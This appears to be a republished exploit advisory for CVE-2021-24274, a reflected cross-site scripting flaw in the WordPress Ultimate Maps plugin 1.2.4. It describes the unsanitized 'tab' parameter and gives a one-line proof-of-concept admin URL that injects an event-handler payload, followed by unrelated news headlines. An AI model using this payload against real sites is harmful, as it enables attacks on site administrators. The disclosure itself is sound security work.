WordPress Ultimate Maps plugin version 1.2.4 suffers from a cross site scripting vulnerability.
advisories | CVE-2021-24274
# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/
# Version: 1.2.4
# Tested on: Windows 10
# CVE: CVE-2021-242741. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Related posts:
Webinar: How to See More, But Respond Less with Enhanced Threat Visibility
Microsoft fixes Outlook zero-day used by Russian hackers since April 2022
Ukraine Warns of Cyber attack Aiming to Hack Users' Telegram Messenger Accounts
How to track your moods in watchOS 10
Nighthawk Likely to Become Hackers' New Post-Exploitation Tool After Cobalt Strike